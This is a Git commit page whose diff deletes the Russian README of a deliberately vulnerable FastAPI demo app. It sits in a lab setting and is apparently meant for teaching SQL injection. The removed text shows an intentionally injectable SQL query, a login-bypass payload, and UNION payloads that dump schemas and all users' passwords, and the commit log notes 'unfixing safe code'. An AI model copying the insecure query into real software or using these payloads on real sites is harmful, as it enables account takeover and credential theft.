added argparse for poc and requirements

working poc added
MY BRAIN IS MELTIIINNG
2025-12-16 02:30:55 +10:00 · 2025-12-16 02:26:01 +10:00 · 2025-12-16 02:15:51 +10:00 · 2025-12-16 01:55:09 +10:00 · 2025-12-16 01:51:19 +10:00 · 2025-12-15 23:07:46 +10:00
1 changed files with 0 additions and 112 deletions
--- a/readme.md
+++ b/readme.md
@@ -1,112 +0,0 @@
 # Kulesh_Web_app - Уязвимое веб-приложение
 Это уязвимое веб-приложение создано для демонстрации SQL-инъекций и других веб-уязвимостей. Приложение написано на Python с использованием FastAPI.
 ## Функциональность приложения
 - ✅ Регистрация пользователей
 - ✅ Авторизация пользователей  
 - ✅ Cookie-аутентификация
 - ✅ Страница приветствия для авторизованных пользователей
 - ✅ Docker-контейнеризация
 ## Сборка и запуск
 ### Сборка Docker-образа
 ```bash
 docker build -t kulesh_web-app:v0.0.1a .
 ```
 ### Запуск приложения
 ```bash
 docker compose up
 ```
 Приложение будет доступно по адресу: http://localhost:8000
 ## Работа с CURL
 ### Регистрация пользователя Administrator
 ```bash
 curl -X POST -d "login=Administrator&password=admin123" http://localhost:8000/register
 ```
 ### Регистрация пользователя Kulesh_AS
 ```bash
 curl -X POST -d "login=kulesh_as&password=mypass123" http://localhost:8000/register
 ```
 ### Авторизация через CURL
 ```bash
 curl -X POST -d "login=Administrator&password=admin123" -c cookies.txt http://localhost:8000/login
 ```
 ### Доступ к защищенной странице
 ```bash
 curl -b cookies.txt http://localhost:8000/welcome
 ```
 ## ЭКСПЛУАТАЦИЯ УЯЗВИМОСТЕЙ
 ### SQL-инъекция через форму авторизации
 Приложение содержит критическую SQL-инъекцию в формах регистрации и авторизации. Уязвимый код:
 ```python
 cursor.execute(f"SELECT * FROM users WHERE login='{login}' AND password='{password}'")
 ```
 Данные пользователя напрямую подставляются в SQL-запрос без экранирования, что позволяет выполнять произвольные SQL-команды.
 ### Базовый обход аутентификации
 **Payload для поля login:**
 ```sql
 ' OR 1=1--
 ```
 **Поле password:** (любое значение)
 Этот payload закомментирует проверку пароля и войдет как первый пользователь в базе.
 ### Извлечение информации о базе данных
 #### 1. Получение списка подключенных файлов БД:
 ```sql
 ' UNION SELECT 1, group_concat(name || ':' || file), 3 FROM pragma_database_list --
 ```
 #### 2. Получение списка пользовательских таблиц:
 ```sql
 ' UNION SELECT 1, group_concat(name), 3 FROM sqlite_master WHERE type='table' AND name NOT LIKE 'sqlite_%' --
 ```
 #### 3. Получение схем всех таблиц:
 ```sql
 ' UNION SELECT 1, group_concat(sql, char(10) || char(10)), 3 FROM sqlite_master WHERE type='table' --
 ```
 #### 4. Извлечение всех пользователей и паролей:
 ```sql
 ' UNION SELECT id, login, password FROM users --
 ```
 #### 5. Получение данных конкретного пользователя Administrator:
 ```sql
 ' UNION SELECT id, login, password FROM users WHERE login='Administrator' --
 ```
 ### Пошаговая эксплуатация
 1. **Откройте форму входа:** http://localhost:8000/login
 2. **Введите базовый payload для обхода аутентификации:**
   - Login: `' OR 1=1--`
   - Password: `test`
 3. **Для извлечения данных используйте UNION-based инъекцию:**
   - Login: `' UNION SELECT id, login, password FROM users --`
   - Password: `test`
 4. **В ответе на странице приветствия вы увидите данные всех пользователей**
Author	SHA1	Message	Date
OkunElya	a05fd59274	added argparse for poc and requirements	2025-12-16 02:30:55 +10:00
OkunElya	d990cf5482	working poc added MY BRAIN IS MELTIIINNG	2025-12-16 02:26:01 +10:00
OkunElya	2295061943	exploit is now possible	2025-12-16 02:15:51 +10:00
OkunElya	fa7d2c7cba	removed unused endpoint	2025-12-16 01:55:09 +10:00
OkunElya	532556dacd	unfixing safe code	2025-12-16 01:51:19 +10:00
OkunElya	f18f545e33	minimal visual improvements	2025-12-15 23:07:46 +10:00
OkunElya	661fee131e	vunerability added	2025-12-15 23:05:11 +10:00
OkunElya	641df7cfe8	table creation added	2025-12-15 22:44:12 +10:00
OkunElya	5c7d16f418	minimal building container	2025-12-15 22:27:26 +10:00